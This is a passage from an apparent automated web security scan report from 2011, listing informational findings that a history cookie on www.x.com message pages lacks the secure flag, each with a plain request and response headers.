...[SNIP]...

2.147. https://www.x.com/message/212001

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212001

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/212001 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:35 GMT; Path=/
Vary: User-Agent
JP: D=105378 t=1313157515407297
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.148. https://www.x.com/message/212124

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212124

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/212124 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:35 GMT; Path=/
Vary: User-Agent
JP: D=62279 t=1313157514975703
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.149. https://www.x.com/message/212170

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212170

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/212170 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333334333b312c35333539323b312c35333437393b312c35333037353b312c35333631303b312c35333631393b312c35333637393b312c35333632383b312c35333636373b312c34353633303b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:34 GMT; Path=/
Vary: User-Agent
JP: D=97085 t=1313157514570063
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.150. https://www.x.com/message/212753

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212753

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/212753 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:34 GMT; Path=/
Vary: User-Agent
JP: D=168395 t=1313157514196506
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.151. https://www.x.com/message/212906

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212906

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/212906 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:33 GMT; Path=/
Vary: User-Agent
JP: D=62986 t=1313157513210614
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.152. https://www.x.com/message/213354

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213354

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213354 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:32 GMT; Path=/
Vary: User-Agent
JP: D=113506 t=1313157512852345
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.153. https://www.x.com/message/213546

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213546

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213546 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:31 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333631303b312c34353633303b312c35333632383b312c35333636373b312c35333631393b312c35333637393b312c35333638373b312c35333731303b312c35333833383b312c35333839393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:32 GMT; Path=/
Vary: User-Agent
JP: D=101383 t=1313157512015652
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.154. https://www.x.com/message/213568

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213568

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213568 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:31 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333631393b312c34353633303b312c35333632383b312c35333637393b312c35333636373b312c35333638373b312c35333731303b312c35333833383b312c35333839393b312c35333933353b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:31 GMT; Path=/
Vary: User-Agent
JP: D=61024 t=1313157511632200
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.155. https://www.x.com/message/213571

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213571

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213571 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333632383b312c34353633303b312c35333638373b312c35333636373b312c35333637393b312c35333731303b312c35333833383b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:31 GMT; Path=/
Vary: User-Agent
JP: D=67689 t=1313157511258036
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.156. https://www.x.com/message/213767

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213767

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213767 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:31 GMT; Path=/
Vary: User-Agent
JP: D=90276 t=1313157510953739
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.157. https://www.x.com/message/213787

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213787

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213787 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333636373b312c35333638373b312c34353633303b312c35333731303b312c35333833383b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:30 GMT; Path=/
Vary: User-Agent
JP: D=78709 t=1313157510281228
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.158. https://www.x.com/message/213788

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213788

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213788 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333638373b312c35333833383b312c34353633303b312c35333731303b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:29 GMT; Path=/
Vary: User-Agent
JP: D=103606 t=1313157509903054
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.159. https://www.x.com/message/213865

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213865

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213865 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c34353633303b312c35333731303b312c35333833383b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:29 GMT; Path=/
Vary: User-Agent
JP: D=179001 t=1313157509418868
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.160. https://www.x.com/message/214347

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214347

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/214347 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333833383b312c35333936313b312c35333933353b312c35333839393b312c35333731303b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:28 GMT; Path=/
Vary: User-Agent
JP: D=78567 t=1313157508050072
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.161. https://www.x.com/message/214440

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214440

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/214440 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333731303b312c35333933353b312c35333936313b312c35333833383b312c35333839393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:27 GMT; Path=/
Vary: User-Agent
JP: D=115134 t=1313157507734977
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.162. https://www.x.com/message/214618

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214618

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/214618 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:27 GMT; Path=/
Vary: User-Agent
JP: D=71895 t=1313157507417708
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.163. https://www.x.com/message/214902

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214902

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/214902 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:27 GMT; Path=/
Vary: User-Agent
JP: D=61141 t=1313157507100954
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.164. https://www.x.com/message/214926

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214926

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/214926 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:26 GMT; Path=/
Vary: User-Agent
JP: D=86752 t=1313157506769901
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.165. https://www.x.com/message/215245

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215245

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/215245 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:37 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:37 GMT; Path=/
Vary: User-Agent
JP: D=90525 t=1313157517859526
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.166. https://www.x.com/message/215254

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215254

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/215254 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:37 GMT; Path=/
Vary: User-Agent
JP: D=103642 t=1313157517314351
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.167. https://www.x.com/message/215264

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215264

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/215264 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:37 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:38 GMT; Path=/
Vary: User-Agent
JP: D=198038 t=1313157518364086
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.168. https://www.x.com/message/215276

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215276

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/215276 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333937373b312c35343036353b312c35343035383b312c34373636333b312c35333838343b312c35333135383b312c35333137323b312c35333235323b312c35333331323b312c35333331393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:38 GMT; Path=/
Vary: User-Agent
JP: D=113550 t=1313157518862899
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
